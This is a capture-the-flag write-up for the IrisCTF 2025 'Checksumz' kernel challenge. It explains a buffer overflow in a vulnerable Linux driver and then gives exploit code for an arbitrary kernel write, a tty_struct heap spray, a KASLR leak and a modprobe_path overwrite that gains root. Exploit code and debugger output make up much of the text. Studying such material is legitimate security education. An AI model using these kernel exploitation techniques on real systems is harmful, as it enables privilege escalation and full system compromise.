IrisCTF 2025 - Checksumz

CTFtime task Challenge files

Problem statement


We’re given a nicely setup environment with a vulnerable kernel module.

Below this the main struct with holds the driver’s state per file descriptor.

struct checksum_buffer {
	loff_t pos;
	char state[512];
	size_t size;
	size_t read;
	char* name;
	uint32_t s1;
	uint32_t s2;

It gets initialized in the open handler, note the kzalloc and pay attention to the size of each allocation.

SLUB is the default allocator for most Linux systems and we know that it allocates blocks in fixed sizes and the page frames are separate[1]. So, kmalloc-128 is used to allocations like 100 bytes, kmalloc-256 for 200 bytes, etc.

static int checksumz_open(struct inode *inode, struct file *file) {
	file->private_data = kzalloc(sizeof(struct checksum_buffer), GFP_KERNEL);
	struct checksum_buffer* buffer = (struct checksum_buffer*) file->private_data;

    // ...

	buffer->name = kzalloc(1000, GFP_KERNEL);

    // ...

	return 0;

In this case, since the allocations are above 512 and below 1024 bytes, they’ll get allocated in kmalloc-1024.

Buffer overflow

Below are the lseek and write handlers. Note that the overflow happens because we can set the buffer->pos to the end of the buffer, and during the write, it’ll overflow.

static loff_t checksumz_llseek(struct file *file, loff_t offset, int whence) {
	struct checksum_buffer* buffer = file->private_data;

	switch (whence) {
		case SEEK_SET:
			buffer->pos = offset;
            // ...

	if (buffer->pos < 0)
		buffer->pos = 0;

	if (buffer->pos >= buffer->size) // size is 256
		buffer->pos = buffer->size - 1; // so we can set it to 255

	return buffer->pos;

// ...

static ssize_t checksumz_write_iter(struct kiocb *iocb, struct iov_iter *from) {
    struct checksum_buffer* buffer = iocb->ki_filp->private_data;
    size_t bytes = iov_iter_count(from);

    if (!buffer)
        return -EBADFD;
    if (!bytes)
        return 0;

    ssize_t copied = copy_from_iter(buffer->state + buffer->pos, min(bytes, 16), from); // we can start write from 255 to 255 + 16

    buffer->pos += copied;
    if (buffer->pos >= buffer->size)
        buffer->pos = buffer->size - 1;
    return copied;

And there is also a read that overflows, it leaks 256 bytes instead of 16.

static ssize_t checksumz_read_iter(struct kiocb *iocb, struct iov_iter *to) {
// ...
    ssize_t copied = copy_to_iter(buffer->state + buffer->pos, min(bytes, 256), to);
// ...
    return copied;

hands on

Let’s test our assumptions debugging the kernel with driver. In the CTF challenge files we have symbols, so setting a breakpoint is as easy as b *(checksumz_write_iter+113).

And to trigger the breakpoint we can open the file descriptor and write to it:

// ...
    int fd = open("/dev/checksumz", O_RDWR);
    ssize_t written_bytes = write(fd, &data, sizeof(data));
// ...

In gdb when the breakpoint is triggered, let’s inspect the checksum_buffer: object:

pwndbg> p/x $rbx
$5 = 0xff11000004a50800

pwndbg> p/x *((struct checksum_buffer*)$rbx)
$1 = {
  pos = 0x1ff,
  state = {0x0 <repeats 512 times>},
  size = 0x100,
  read = 0x0,
  name = 0xff11000004a51400,
  s1 = 0x1,
  s2 = 0x0

pwndbg> p/x ((struct checksum_buffer*)$rbx)->name-$rbx
$8 = 0xc00
pwndbg> p 0xc00/0x400
$9 = 3

Both heap allocations we discussed before are 1024 (0x400 in hex) aligned, i.e. their addresses are multiples of 0x400. We can also see that both allocations are close, just 0x400 * 3 bytes apart.

unlocking abilities (getting a better primitive)

The first we’re going to do is to override that size variable withthe overflow we have in the state buffer, since they’re next to each other we just need to lseek to the end of state and then write a big value for size.

Now that we are no longer constrained by 16 bytes right after state, we can also override the name string pointer. This is going to be very useful since we can use the rename ioctl to write to that pointer 48 bytes.

static long checksumz_ioctl(struct file *file, unsigned int command, unsigned long arg) {
	struct checksum_buffer* buffer = file->private_data;
	if (!file->private_data)
		return -EBADFD;
	switch (command) {
        // ...
			char __user *user_name_buf = (char __user*) arg;

			if (copy_from_user(buffer->name, user_name_buf, 48)) {
				return -EFAULT;
        // ...

By overwriting the value in the name pointer and calling the rename ioctl we have an arbitrary write anywhere in the kernel :)

void arb_write(int fd, uint64_t addr, uint64_t* data) {
    lseek(fd, 0x210, addr);
    write(fd, &addr, sizeof(addr));

    if (ioctl(fd, CHECKSUMZ_IOCTL_RENAME, data) < 0) {
        perror("ioctl - CHECKSUMZ_IOCTL_RENAME");

Heap magic

Oops, the writeup for this part is in progress…

modprobe_path, KASLR, kmalloc-1024

Since we have a overflow on a object allocated to kmalloc-1024 the heap layout will look like this:


We can read and write to those objects since we can just offset via lseek by 0x400 steps. We want to organize the heap in a way that we know which objects will be allocated next to our checksum_buffer struct. Looking for kmalloc-1024 at [2] we see that there is tty_struct that can be allocated by opening /dev/ptmx.

Below is the code to spray the heap with tty_structs which will be placed at kmalloc-1024. We allocate objects before too, to defragment the heap’s freelist and to ensure that it’ll work if the heap grows backwards or forwards.

    // spray sandwich below:
    // the sprayed objs are tty_struct
    // ref:
    // spray before (bread)
    int spray[SPRAY_SZ];
    for(int i = 0; i < SPRAY_SZ / 2; i++) {
        spray[i] = open( "/dev/ptmx" , O_RDONLY | O_NOCTTY);
        if(spray[i] == -1) {

    // object with overflow (cheese)
    int fd = open("/dev/checksumz", O_RDWR);

    // spray after (bread)
    for(int i = SPRAY_SZ / 2; i < SPRAY_SZ; i++) {
        spray[i] = open( "/dev/ptmx" , O_RDONLY | O_NOCTTY);
        if(spray[i] == -1) {

After the code above is executed the heap will look like the diagram below:


We’ll verify our understanding of the system by debugging it with gdb again. When we run those commands below, rbx is holding the value of a address of a checksum_buffer.

pwndbg> p/x $rbx
$2 = 0xff11000004962400

pwndbg> telescope 0xff11000004962400+0x400
00:0000│  0xff11000004962800 ◂— 0x7e00000001
01:0008│  0xff11000004962808 ◂— 0
02:0010│  0xff11000004962810 —▸ 0xff1100000414b240 ◂— 0x101
03:0018│  0xff11000004962818 —▸ 0xff110000048edc00 —▸ 0xff110000048edc50 ◂— 0
04:0020│  0xff11000004962820 —▸ 0xffffffff82289480 (ptm_unix98_ops) —▸ 0xffffffff8163dfa0 (ptm_unix98_lookup) ◂— endbr64
05:0028│  0xff11000004962828 —▸ 0xff1100000459b050 —▸ 0xffffffff82bd14a0 (n_tty_ops) —▸ 0xffffffff82722080 (.LC3+121) ◂— 0x7264007974745f6e /* 'n_tty' */
06:0030│  0xff11000004962830 ◂— 0
07:0038│  0xff11000004962838 ◂— 0

pwndbg> telescope 0xff11000004962400+0x400*3
00:0000│  0xff11000004963000 ◂— 0x7e00000001
01:0008│  0xff11000004963008 ◂— 0
02:0010│  0xff11000004963010 —▸ 0xff1100000414b840 ◂— 0x101
03:0018│  0xff11000004963018 —▸ 0xff110000048ed400 —▸ 0xff110000048ed450 ◂— 0
04:0020│  0xff11000004963020 —▸ 0xffffffff82289360 (pty_unix98_ops) —▸ 0xffffffff8163e4c0 (pts_unix98_lookup) ◂— endbr64
05:0028│  0xff11000004963028 —▸ 0xff1100000459b5f0 —▸ 0xffffffff82bd14a0 (n_tty_ops) —▸ 0xffffffff82722080 (.LC3+121) ◂— 0x7264007974745f6e /* 'n_tty' */
06:0030│  0xff11000004963030 ◂— 0
07:0038│  0xff11000004963038 ◂— 0

Note the values at the offsets 0x20: 0xffffffff82289480 and 0xffffffff82289360. These are high memory addresses that point to global variables on the kernel, we can use them to break KASLR

for (int i = 1; i <= 8; i++) {
    uint64_t kbase_leak = io_read(fd, 0x400 * i + (3 * 0x8)); // next kmalloc-1024 slot
    if (kbase_leak < 0xffffffff81000000) continue;  // verify that we have a high-address pointer

    printf("(~) kbase_leak %016lx\n", kbase_leak);
    uint64_t ptm_unix98_ops_offset = 0xffffffff82289360 - 0xffffffff81000000;
    kbase = (kbase_leak - ptm_unix98_ops_offset) & 0xffffffffffff0000;

Arb write + KASLR leak = PRIVESC

Now that we have those primitives, it’s just a matter of rewriting the modprobe_path variable (see [1]) and executing a malformed binary.

uint64_t modprobe_path_offset = 0xffffffff82b3f100 - 0xffffffff81000000;
printf("(!) modprobe_path: %016lx\n", kbase + modprobe_path_offset);

write_global(fd, kbase + modprobe_path_offset, (uint64_t*)"/tmp/p");
system("echo -ne '#!/bin/sh\ncat /dev/vda > /tmp/flag' > /tmp/p");
system("chmod a+x /tmp/p");
system("echo -ne '\xff\xff\xff\xff' > /tmp/executeme");
system("chmod a+x /tmp/executeme");
printf("(!) Modprobe Setup done :)\n");

char flag_buf[0x200];
FILE* flag = fopen("/tmp/flag", "r");
fscanf(flag, "%s", flag_buf);
printf("(~) FLAG: %s\n", flag_buf);
